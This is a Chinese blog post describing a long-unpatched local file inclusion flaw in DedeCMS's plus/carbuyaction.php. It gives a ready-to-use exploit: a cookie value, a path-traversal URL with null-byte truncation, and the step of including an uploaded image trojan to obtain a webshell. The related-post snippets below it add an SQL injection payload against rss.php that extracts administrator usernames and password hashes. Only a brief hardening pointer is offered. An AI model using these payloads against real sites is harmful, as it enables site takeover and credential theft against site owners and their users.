DedeCMS漏洞文件之carbuyaction.php

最新推荐文章于 2022-04-06 17:45:15 发布
最新推荐文章于 2022-04-06 17:45:15 发布
阅读量2.4k 收藏
点赞数
文章标签: 漏洞 文件
DedeCMS漏洞文件之carbuyaction.php


dedecms教程

DedeCMS漏洞文件之carbuyaction.php,这个漏洞长达几年,跨了几个版本,网上也公开过了,DedeCMS就是不修复,可以直接导致拿shell


详细说明:漏洞文件carbuyaction.php





本地试了一下,最新DedeCMS版本一样可行。

首先利用cookie修改工具,加上 code=alipay 然后访问

http://www.xxx.com/plus/carbuyaction.php?dopost=returncode=../../uploads/userup/xx/myface.gif%00

直接包含成功

利用条件为GPC OFF ,或者某些环境下的截断。

可以在会员中心里上传个图片木马进行拿shell。

还可以包含dede自身文件进行更多利用,这里就不详细了。





漏洞证明:更新最新版本,覆盖同名文件,然后做好目录读写执行权限(《织梦DedeCms V5.5/V5.6/v5.7等安全设置指南》)




DEDECMS列表页随机调用缩略图的完美解决办法
xvrywgb
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DEDECMS v5.6漏洞复现
_Ralph的博客
01-16 7904
织梦内容管理系统(dedecms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类cms系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 闲来无事,复现一下dedecms v5.6版
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
weixin_34090643的博客
03-21 1098
漏洞版本: DedeCmsV5.6 漏洞描述: DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。 1 <?php 02 require_once (dirname(__FILE__) . "/../include/comm...
Dedecms中一个重大漏洞文件carbuyaction.php,请注意修复
zxy840552216的博客
09-15 453
使用过DEDECMS的人,可能很多都知道了这个漏洞,在DEDECMS5.X版本中,这个文件漏洞一直存在,文件如下:漏洞文件carbuyaction.php 首先利用cookie修改工具,加上code=alipay然后访问 http://www.xxx.com/plus/carbuyaction.php?dopost=return&code=../../uploads/userup/xx/myface.gif%00 直接包含成功 利用条件为GPCOFF,或者某些环境下的...
DedeCms 5.x 本地文件包含漏洞(respond方法)
weixin_33795743的博客
03-21 246
漏洞版本: DedeCms 5.x 漏洞描述: DedeCms是免费的PHP网站内容管理系统。 plus/carbuyaction.php里没有对变量进行严格的过滤 出现漏洞的两个文件为: Include/payment/alipay.php Include/payment/yeepay.php 漏洞均出现在respond方法里 Include/payme...
织梦Dedecms buy_action.php SQL注入漏洞分析
深秋哋黎明的专栏
11-20 5608
Dedecms buy_action.php SQL注入漏洞分析 0x01 补丁对比 通过对比源码和2月25日补丁发现被改动的文件有三个,buy_action.php、uploadsafe.inc.php和sys_info.htm。 sys_info.htm只是添加了一个重置cfg_cookie_encode的代码,而且是静态文件,可以忽略掉。uploadsafe.inc.php
web应用漏洞.docx
07-05
1. DedeCMS carbuyaction.php 存储型跨站脚本漏洞:攻击者可以通过该漏洞注入恶意脚本。 四、文件包含漏洞 1. DedeCMS 5.7 SP1 /install/index.php 远程文件包含漏洞:攻击者可以通过该漏洞执行任意代码。 五、...
Dedecms存在储存型跨站脚本漏洞1
08-03
漏洞存在于Dedecms的会员功能模块,特别是"shop"模块中的`carbuyaction.php`文件漏洞细节: 在DedeCMS的V5.7-UTF8-SP2版本中,当用户在进行购物操作时,提交的`address`、`des`、`email`和`postname`这四个...
DEDE织梦支付插件
08-28
http://您的网站域名/plus/carbuyaction.php?dopost=return&code=XddpayAlipay 异步通知网址:http://您的网站域名/XddpayNotify.php 4、在DEDE后台【系统】->【支付工具】->【支付接口设置】可以看到安装的接口 ...
响应式国际货运物
05-14
Disallow: /plus/carbuyaction.php Disallow: /plus/shops_buyaction.php Disallow: /plus/erraddsave.php Disallow: /plus/posttocar.php Disallow: /plus/disdls.php Disallow: /plus/feedback_js.php Disallow: /...
DedeCms V5.6 本地包含里的上传漏洞(可是那包含漏洞已经公布)
weixin_33742618的博客
04-19 417
2019独角兽企业重金招聘Python工程师标准>>> ...
织梦config_base.php 目录在哪里,Dedecms织梦文件目录结构全面解析
weixin_30183847的博客
03-12 470
Dedecms织梦文件目录结构全面解析织梦无忧2018-12-07 08:36摘要:鉴于很多新手朋友不知道织梦很多目录和文件具体有何作用,而现互联网亦没有相对全面的dedecms文件目录解说,so,织梦新手网在相对全面的基础上整理了以下目录文件,织梦58首发! 以下一些目录对应的文件和代表的含义均是在相对详细下完成的,如若有错误请联鉴于很多新手朋友不知道织梦很多目录和文件具体有何作用,而现互联网亦...
Dedecms文件目录结构解说
﹎厡.唻
08-31 1101
织梦:DedeAMPZ/Web /根目录  ../a 默认生成文件存放目录  ../data 系统缓存或其他可写入数据存放目录  ../dede 默认后台登录管理(可任意改名)  ../images 系统默认的部分系统需要的图片目录  ../include 程序核心系统文件目录  ../install 安装文件目录  ../member 会员系统目录  ../plus
DedeCMS_v5.7漏洞复现
qq_51459600的博客
04-06 1万+
DedeCMS_v5.7漏洞复现 环境搭建: 服务器:WinServer2008(10.10.10.143) + phpstudy2018 DedeCMS版本:DedeCMS-V5.7-UTF8-SP2 下载地址:https://pan.baidu.com/s/1GQjWSDe7IlMVsVJ7HvrBOw 提取码: i4wk 0x01 URL重定向 版本<=5.7sp2 漏洞复现 payload: http://10.10.10.143/Dedecms/plus/download.php?open
关于Dedecms织梦文件目录结构全面解析
qq_17475727的博客
08-19 728
本文主要是为了今后对Dedecms做二次开发所写。 安装后dedecms的目录,如下图所示 “a”: 默认HTML文件存放目录 “data”: 系统缓存或其它可写入数据存放目录 “dede”: 默认后台管理目录 “images”: 系统默认模板图片存放目录 “include”: 类库文件目录 “install”: 安装程序目录,安装完后可删除 “member”: 会员目录 “plus”: 附助...
dedecms 漏洞汇总
热门推荐
积木网络
02-29 1万+
Dedecms 5.6 rss注入漏洞   http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2)) AND "'" AND updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM dede_admin),1)#'][0]=1 DedeCms v5.6 嵌入
手把手教你dedecms命令执行漏洞复现,纯小白也能玩懂的漏洞复现
炙热的酷盖
08-05 872
dedecms 5.7 sp2 存在命令执行漏洞 下载链接:http://www.dedecms.com/products/dedecms/ 选择UTF8就行 由于作者在进行漏洞复现时踩了很多坑,现将详细步骤附上,希望对大家有所帮助 首先需要有一个后台账号,登入网站后台 在后缀下输入/tpl.php?action=upload 查看网页源代码,找到token 记录下token: 065304c806f8f8dacb2aec2c41ace0d7 访问 http://192.16
300ssm_jsp_mysql 记账管理系统.zip(可运行源码+sql文件+文档)
06-28
管理员需要配置的功能模块如下: (1)系统用户管理,管理员能够对系统中存在的用户的信息进行合理的维护操作,可以查看用户的信息以及在线进行密码的更换; (2)用户管理,管理员可以对该系统中用户进行管理,这个模块主要针对企业中的员工用户,管理员能够对这类的用户信息进行线上化的维护管理; (3)财务管理,该模块是整个系统的核心模块内容,在该模块的设计上,是通过对用户输入的收入、支出情况进行完整的内容查看,并且能够在线新增财务信息。 (4)财务统计,在财务统计的功能模块中,管理员可以看到当前所有用户累计的财务支出以及收入的情况,可以实现有效的数据统计工作。 本次的系统业务设计上是通过B/S结构来进行相应的管理系统搭建的。通过MVC三层框架结构来对整个系统中的不同功能模块实现分层的开发。在整个开发的过程中通过对不同的角色用户进行不同的功能权限的分配来对整个系统进行完整的设计。通过对不同的记账管理系统进行研究分析,了解到当下的记账管理系统普遍在收入、支出的统计上作为系统的核心要素来进行设计,在收支的系统自动统计上也需要进行有效的合理的内容设计。并且不同人员输入的信
一个简单的计数器,带有 2 个多路复用 SSD 和 2 个推送 btns 以递增或复位,使用分层架构在基于 stm32 ARM
06-28
一个简单的计数器,带有 2 个多路复用 SSD 和 2 个推送 btns 以递增或复位,使用分层架构在基于 stm32 ARM 的微控制器上运行
yolov8算法火焰和烟雾识别训练权重+数据集
最新发布
06-28
yolov8算法火焰和烟雾识别训练权重, 包含15000多火焰和烟雾识别数据集(有网盘链接),数据集目录已经配置好,划分好 train,val, test,并附有data.yaml文件,yolov5、yolov7、yolov8,yolov9等算法可以直接进行训练模型,txt格式标签, 数据集和检测结果参考:https://blog.csdn.net/zhiqingAI/article/details/124230743 数据集配置目录结构data.yaml: nc: 2 names: - fire - smoke

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值